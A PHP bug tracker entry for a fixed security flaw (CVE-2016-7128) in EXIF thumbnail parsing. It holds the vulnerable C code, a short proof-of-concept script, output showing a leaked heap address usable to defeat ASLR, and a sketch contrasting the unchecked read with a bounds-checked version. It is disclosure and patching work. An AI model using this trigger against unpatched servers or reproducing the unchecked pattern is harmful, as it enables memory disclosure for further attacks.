Sec Bug #72627 Memory Leakage In exif_process_IFD_in_TIFF
Submitted: 2016-07-20 07:03 UTC Modified: 2016-09-05 15:28 UTC
From: nguyenvuhoang199321 at gmail dot com Assigned: stas
Status: Closed Package: EXIF related
PHP Version: 5.6.24 OS: *Nix
Private report: No CVE-ID: 2016-7128
 [2016-07-20 07:03 UTC] nguyenvuhoang199321 at gmail dot com
Description:
------------
I found some vulnerable code that leads to the memory leak in exif_process_IFD_in_TIFF. Let's take a look at the code chunk:
```
if (!ImageInfo->Thumbnail.data && ImageInfo->Thumbnail.offset && ImageInfo->Thumbnail.size && ImageInfo->read_thumbnail) {
	ImageInfo->Thumbnail.data = safe_emalloc(ImageInfo->Thumbnail.size, 1, 0);
	php_stream_seek(ImageInfo->infile, ImageInfo->Thumbnail.offset, SEEK_SET);
	fgot = php_stream_read(ImageInfo->infile, ImageInfo->Thumbnail.data, ImageInfo->Thumbnail.size);
	if (fgot < ImageInfo->Thumbnail.size) {
		EXIF_ERRLOG_THUMBEOF(ImageInfo)
	}
	exif_thumbnail_build(ImageInfo);
}
```
Because of the lack of checking of ImageInfo->Thumbnail.offset, if an attacker sets ImageInfo->Thumbnail.offset larger than ImageInfo->FileSize then *php_stream_read* returns 0 to fgot, because EXIF_ERRLOG_THUMBEOF was defined as:
```
#define EXIF_ERRLOG_THUMBEOF(ImageInfo)   exif_error_docref(NULL EXIFERR_CC, ImageInfo, E_WARNING, "%s", EXIF_ERROR_THUMBEOF);

```
As you can see there is no exit after this error is output.
After that exif_thumbnail_build(ImageInfo) is called. Because the thumbnail I applied is IMAGE_FILETYPE_JPEG, exif_thumbnail_build will return without error.

Finally, ImageInfo->Thumbnail.data is not filled by user data, which leads to an information leak like below. An attacker can leak an address and then use it to bypass some protections such as PIE, ASLR, ...

Here is the TIFF file: https://drive.google.com/open?id=0B0D1DYQpkA9UVGE5QlJaNnIxb1E

Affects: Linux, Mac OS X

Test script:
---------------
<?php
	$exif = exif_read_data('exif/gen.tiff',0,0,true);
	var_dump($exif);

	$thumb = $exif['THUMBNAIL']['THUMBNAIL'];
	echo bin2hex($thumb);
?>

Actual result:
--------------
$./php exif.php

Warning: exif_read_data(gen.tiff): Thumbnail goes IFD boundary or end of file reached in /vagrant_extend/audit/exif.php on line 2

Warning: exif_read_data(gen.tiff): Error in TIFF: filesize(x04E2) less than start of IFD dir(x829A0004) in /vagrant_extend/audit/exif.php on line 2
array(11) {
  ["FileName"]=>
  string(8) "gen.tiff"
  ["FileDateTime"]=>
  int(1468986539)
  ["FileSize"]=>
  int(1250)
  ["FileType"]=>
  int(7)
  ["MimeType"]=>
  string(10) "image/tiff"
  ["SectionsFound"]=>
  string(30) "ANY_TAG, IFD0, THUMBNAIL, EXIF"
  ["COMPUTED"]=>
  array(10) {
    ["html"]=>
    string(24) "width="128" height="132""
    ["Height"]=>
    int(132)
    ["Width"]=>
    int(128)
    ["IsColor"]=>
    int(0)
    ["ByteOrderMotorola"]=>
    int(0)
    ["ApertureFNumber"]=>
    string(5) "f/1.0"
    ["Thumbnail.FileType"]=>
    int(2)
    ["Thumbnail.MimeType"]=>
    string(10) "image/jpeg"
    ["Thumbnail.Height"]=>
    int(132)
    ["Thumbnail.Width"]=>
    int(128)
  }
  ["XResolution"]=>
  string(21) "1414812756/1414812756"
  ["THUMBNAIL"]=>
  array(5) {
    ["ImageWidth"]=>
    int(128)
    ["ImageLength"]=>
    int(132)
    ["JPEGInterchangeFormat"]=>
    int(1280)
    ["JPEGInterchangeFormatLength"]=>
    int(200)
    ["THUMBNAIL"]=>
    string(200) "" # leak leak
  }
  ["ExposureTime"]=>
  string(21) "1414812756/1414812756"
  ["FNumber"]=>
  string(21) "1414812756/1414812756"
}
00c2a7081e7f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 => leak leak (00c2a7081e7f => 0x7f1e08a7c200)
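
The pattern described in the report above, reduced to a self-contained C sketch with a bounds-checked variant beside it. This is an added example, not PHP's code and not the committed fix; `mem_file`, `stale_alloc`, the `thumb_read_*` functions and the 0xAA marker (standing in for leftover heap contents) are hypothetical, while the offset 1280, length 200 and file size 1250 come from the output above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed stand-in for the image file held in memory. */
typedef struct { const unsigned char *buf; size_t size; } mem_file;

/* Mimics seek + read on a stream: reading at or past the end yields 0 bytes. */
static size_t mf_read_at(const mem_file *f, size_t off, void *dst, size_t n) {
    if (off >= f->size) return 0;
    if (n > f->size - off) n = f->size - off;
    memcpy(dst, f->buf + off, n);
    return n;
}
/* Stand-in for a recycled heap chunk: 0xAA marks bytes left by an earlier user. */
static unsigned char *stale_alloc(size_t n) {
    unsigned char *p = malloc(n);
    if (p) memset(p, 0xAA, n);
    return p;
}
/* Pattern from the report: the short read is only logged, the buffer is still returned. */
unsigned char *thumb_read_unchecked(const mem_file *f, size_t off, size_t size) {
    unsigned char *data = stale_alloc(size);
    if (data && mf_read_at(f, off, data, size) < size)
        fprintf(stderr, "warning: thumbnail goes past end of file\n");
    return data;
}
/* Hardened: reject a range outside the file before allocating; fail closed on a short read. */
unsigned char *thumb_read_checked(const mem_file *f, size_t off, size_t size) {
    if (size == 0 || off > f->size || size > f->size - off) return NULL;
    unsigned char *data = stale_alloc(size);
    if (data && mf_read_at(f, off, data, size) != size) { free(data); data = NULL; }
    return data;
}
/* Number of marker bytes that reach the caller without having come from the file. */
size_t stale_bytes(const unsigned char *p, size_t n) {
    size_t c = 0;
    for (size_t i = 0; p && i < n; i++) c += (p[i] == 0xAA);
    return c;
}
int main(void) {
    static unsigned char img[1250];            /* constructed: FileSize from the report */
    mem_file f = { img, sizeof img };
    unsigned char *v = thumb_read_unchecked(&f, 1280, 200); /* offset/length from the report */
    unsigned char *c = thumb_read_checked(&f, 1280, 200);
    printf("unchecked: %zu stale bytes, checked: %s\n", stale_bytes(v, 200), c ? "buffer" : "rejected");
    free(v); free(c);
    return 0;
}
```

The checked variant also rejects a range that starts inside the file but runs past its end, where the unchecked one would return a buffer that is only partly overwritten.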

 [2016-08-08 07:51 UTC] stas@php.net
-PHP Version: 7.0.8 +PHP Version: 5.6.24 -Assigned To: +Assigned To: stas
 [2016-08-08 07:51 UTC] stas@php.net
Fix in https://gist.github.com/99b4cc71096d54075cf1cc91caf3266e and in security repo in 620b01337cc39f856ca68c34c35e154f5f0682fc. Please verify.
 [2016-08-08 07:59 UTC] nguyenvuhoang199321 at gmail dot com
OK bug is fixed
 [2016-08-15 06:04 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2016-08-17 05:51 UTC] stas@php.net
-Type: Security +Type: Bug
 [2016-08-17 05:51 UTC] stas@php.net
-Type: Bug +Type: Security -Private report: No +Private report: Yes
 [2016-08-17 06:40 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-08-17 06:40 UTC] stas@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.


 [2016-08-17 08:23 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=6dbb1ee46b5f4725cc6519abf91e512a2a10dfed
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-08-17 08:23 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=24fb60ffe9d23a6af27d96b74a85f6a237bbd14a
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-08-17 09:15 UTC] laruence@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=6dbb1ee46b5f4725cc6519abf91e512a2a10dfed
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-08-17 09:15 UTC] laruence@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=24fb60ffe9d23a6af27d96b74a85f6a237bbd14a
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-08-17 12:04 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=749cae0fa13a097c13f96d631cc4e081e545efd4
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-08-17 19:10 UTC] kalle@php.net
Automatic comment on behalf of kalle
Revision: http://git.php.net/?p=php-src.git;a=commit;h=15b7b1a5107f385cbd3551f6c6b5d7149c3adf19
Log: Further fix bug #72627 from Stas
 [2016-08-18 11:15 UTC] tyrael@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=32a629ef2cff754c3dd6cc24eb1e25aeaf439891
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-09-05 15:28 UTC] remi@php.net
-CVE-ID: needed +CVE-ID: 2016-7128
 [2016-10-10 11:17 UTC] krakjoe@php.net
Automatic comment on behalf of kalle
Revision: http://git.php.net/?p=php-src.git;a=commit;h=15b7b1a5107f385cbd3551f6c6b5d7149c3adf19
Log: Further fix bug #72627 from Stas
 [2016-10-17 10:09 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=6dbb1ee46b5f4725cc6519abf91e512a2a10dfed
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2016-10-17 10:09 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=24fb60ffe9d23a6af27d96b74a85f6a237bbd14a
Log: Fixed bug #72627: Memory Leakage In exif_process_IFD_in_TIFF
 [2017-01-12 09:12 UTC] krakjoe@php.net
Automatic comment on behalf of kalle
Revision: http://git.php.net/?p=php-src.git;a=commit;h=15b7b1a5107f385cbd3551f6c6b5d7149c3adf19
Log: Further fix bug #72627 from Stas
 
Last updated: Sun Apr 30 01:01:34 2017 UTC